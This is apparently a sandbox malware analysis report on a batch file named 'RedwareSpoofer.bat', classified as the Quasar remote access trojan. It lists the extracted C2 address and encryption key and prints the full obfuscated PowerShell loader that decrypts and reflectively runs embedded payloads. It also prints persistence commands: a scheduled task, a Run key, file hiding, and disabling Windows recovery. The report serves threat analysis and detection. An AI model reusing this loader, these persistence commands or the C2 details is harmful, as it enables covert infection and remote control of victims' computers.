Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

RedwareSpoofer.bat

windows7-x64

8

RedwareSpoofer.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    130s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 20:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RedwareSpoofer.bat

  • Size

    504KB

  • MD5

    7e3035eb197a52820c5a33c064917a8e

  • SHA1

    147d70a538be4135dbd2ad4dbf2fd750a6d387ee

  • SHA256

    747b16e1c41f4e99be3b52a4dbd712cd4d5407f6afffdf5d20f61b2e4c4d63b6

  • SHA512

    f95b2c680d39bd529dac582aed23340b196bf85bb0bb2011261c8c3d59962d71e18e0d675bfd73c1e24675cc499e022cdc62b9daadd6b0f877ec97988ca8737c

  • SSDEEP

    12288:iuXbEUU3h+QHSyN1iWFTM1hK0gddk5uMmYmi0125gDv:iuXbjUR+IRiWFTMjKpkL7a2sv

Score
10/10
quasaroffice04defense_evasionexecutionpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

45.145.41.216:4782

Mutex

14f7ea9d-a87f-45a9-861e-84025067723f

Attributes
  • encryption_key

    144B0EE0DD77F21360C6C78F9C3080B2B44AE54D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    System32

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    defense_evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RedwareSpoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4172
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4108
      • C:\Windows\system32\ReAgentc.exe
        reagentc.exe /disable
        2⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:4576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IKQYe9gd88vztHJcw6phFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kaqXF=New-Object System.IO.MemoryStream(,$param_var); $EQBuw=New-Object System.IO.MemoryStream; $sJMfi=New-Object System.IO.Compression.GZipStream($kaqXF, [IO.Compression.CompressionMode]::Decompress); $sJMfi.CopyTo($EQBuw); $sJMfi.Dispose(); $kaqXF.Dispose(); $EQBuw.Dispose(); $EQBuw.ToArray();}function execute_function($param_var,$param2_var){ $HYSQt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gXvrb=$HYSQt.EntryPoint; $gXvrb.Invoke($null, $param2_var);}$latne = 'C:\Users\Admin\AppData\Local\Temp\RedwareSpoofer.bat';$host.UI.RawUI.WindowTitle = $latne;$czvVt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($latne).Split([Environment]::NewLine);foreach ($JBkBq in $czvVt) { if ($JBkBq.StartsWith('WwSYUPskWuZgnEierlVQ')) { $YJdtG=$JBkBq.Substring(20); break; }}$payloads_var=[string[]]$YJdtG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:2552
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_439_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4648
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2716
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1012
              • C:\Windows\system32\net.exe
                net file
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3880
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 file
                  6⤵
                    PID:2408
                • C:\Windows\system32\ReAgentc.exe
                  reagentc.exe /disable
                  5⤵
                  • Drops file in Windows directory
                  PID:5044
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IKQYe9gd88vztHJcw6phFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kaqXF=New-Object System.IO.MemoryStream(,$param_var); $EQBuw=New-Object System.IO.MemoryStream; $sJMfi=New-Object System.IO.Compression.GZipStream($kaqXF, [IO.Compression.CompressionMode]::Decompress); $sJMfi.CopyTo($EQBuw); $sJMfi.Dispose(); $kaqXF.Dispose(); $EQBuw.Dispose(); $EQBuw.ToArray();}function execute_function($param_var,$param2_var){ $HYSQt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gXvrb=$HYSQt.EntryPoint; $gXvrb.Invoke($null, $param2_var);}$latne = 'C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat';$host.UI.RawUI.WindowTitle = $latne;$czvVt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($latne).Split([Environment]::NewLine);foreach ($JBkBq in $czvVt) { if ($JBkBq.StartsWith('WwSYUPskWuZgnEierlVQ')) { $YJdtG=$JBkBq.Substring(20); break; }}$payloads_var=[string[]]$YJdtG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                  5⤵
                    PID:2240
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    5⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2880
            • C:\Windows\system32\schtasks.exe
              schtasks /create /tn "Windows_SettingsManager" /tr "\"C:\ProgramData\acwin_manager\windows_systemManager.vbs\"" /sc onlogon /rl highest /f
              2⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4692
            • C:\Windows\system32\reg.exe
              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MicrosoftServiceManager" /t REG_SZ /d "wscript.exe \"C:\ProgramData\acwin_manager\windows_systemManager.vbs\"" /f
              2⤵
              • Adds Run key to start application
              PID:4468
            • C:\Windows\system32\attrib.exe
              attrib +s +h C:\ProgramData\acwin_manager
              2⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:1704

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            661739d384d9dfd807a089721202900b

            SHA1

            5b2c5d6a7122b4ce849dc98e79a7713038feac55

            SHA256

            70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

            SHA512

            81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
            Filesize

            2KB

            MD5

            005bc2ef5a9d890fb2297be6a36f01c2

            SHA1

            0c52adee1316c54b0bfdc510c0963196e7ebb430

            SHA256

            342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

            SHA512

            f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yolr3zcu.axw.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat
            Filesize

            504KB

            MD5

            7e3035eb197a52820c5a33c064917a8e

            SHA1

            147d70a538be4135dbd2ad4dbf2fd750a6d387ee

            SHA256

            747b16e1c41f4e99be3b52a4dbd712cd4d5407f6afffdf5d20f61b2e4c4d63b6

            SHA512

            f95b2c680d39bd529dac582aed23340b196bf85bb0bb2011261c8c3d59962d71e18e0d675bfd73c1e24675cc499e022cdc62b9daadd6b0f877ec97988ca8737c

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs
            Filesize

            115B

            MD5

            731ab16030f423b66b128f17efdbfb73

            SHA1

            3b47e12575187b7d0ac7036bdf5e76490f98b952

            SHA256

            1723dd5e2e5a1614a235e174ba78fd6cf14f6c333b44f9a56c2b32e70a13704f

            SHA512

            4b83ace378f30212ad6415f5b61270853c20cd33c1317350377bfe9eaa2e3bd75e7dd49c4712a26d38317ac0dd544dc8252fa71768b21b24a82f1113188eed2f

            Download Submit

          • C:\Windows\Logs\ReAgent\ReAgent.log
            Filesize

            2KB

            MD5

            3e84107e1dd4caa265c3d22b7f7e7fc9

            SHA1

            b92aceb1ee50be46fec28077288fd9247fc62ba1

            SHA256

            281cbd0231fe4de2932f3dd0bff4576d92b7a5d97070925d62d10b272d2f57ad

            SHA512

            092d03f3546d81adba43d702fd5b79bd3fadbcf8569fe49c3dd81d5b3de5bbf3c3b172a6af69da6f69a3c98ce51b6c1db666a7a65ac8e007b7ea1e0b4e4a2300

            Download Submit

          • C:\Windows\Panther\UnattendGC\diagerr.xml
            Filesize

            11KB

            MD5

            8e193f4da80bb80060d23929482c3acf

            SHA1

            0d82b3479c78768c63815214a9f27ccc08f8480b

            SHA256

            44e6ac132e9a3198f9a7d1855aaa826628fcc3793492c9363cd3db7484f8496c

            SHA512

            33feb674b603258dc87c4313c81901d5b19824a133561a7ed52a2410c81aea48fe7ce4338563226dea2165ffce3ed7b3cc40ff3e8b819d6187d0acecfe2dc8be

            Download Submit

          • C:\Windows\Panther\UnattendGC\diagwrn.xml
            Filesize

            13KB

            MD5

            2b59ad678f0fa47b4d46319e91b5be4e

            SHA1

            3f5f1a2ca5bbd635ad420a082bcb85fe60da9b78

            SHA256

            b4a7e152b8d2efe40c40ef9514059c0efed88a97c10d5e015a66c61f16c47f7b

            SHA512

            69ec72b25f49d736eb45a2841bb0f7fb8ea7ca03a121fa146597f0430069d32f972ba7cb1fcb6f374e0c2927963638b35cb300c169ec80e2a24d5d75a9ae9280

            Download Submit

          • C:\Windows\system32\Recovery\ReAgent.xml
            Filesize

            1KB

            MD5

            44b2da39ceb2c183d5dcd43aa128c2dd

            SHA1

            502723d48caf7bb6e50867685378b28e84999d8a

            SHA256

            894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d

            SHA512

            17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

            Download Submit

          • memory/2880-60-0x000001A9E0230000-0x000001A9E02E0000-memory.dmp

            Filesize

            704KB

            Download

          • memory/2880-67-0x000001A9E0FD0000-0x000001A9E1192000-memory.dmp

            Filesize

            1.8MB

            Download

          • memory/2880-66-0x000001A9E0D40000-0x000001A9E0DF2000-memory.dmp

            Filesize

            712KB

            Download

          • memory/2880-65-0x000001A9E0C30000-0x000001A9E0C80000-memory.dmp

            Filesize

            320KB

            Download

          • memory/4412-4-0x00007FFDE55C3000-0x00007FFDE55C5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4412-16-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4412-21-0x00000239714C0000-0x0000023971516000-memory.dmp

            Filesize

            344KB

            Download

          • memory/4412-15-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4412-5-0x000002396EDE0000-0x000002396EE02000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4412-59-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4412-17-0x0000023971370000-0x00000239713B4000-memory.dmp

            Filesize

            272KB

            Download

          • memory/4412-18-0x0000023971440000-0x00000239714B6000-memory.dmp

            Filesize

            472KB

            Download

          • memory/4412-19-0x000002396EE40000-0x000002396EE48000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4412-20-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

            Download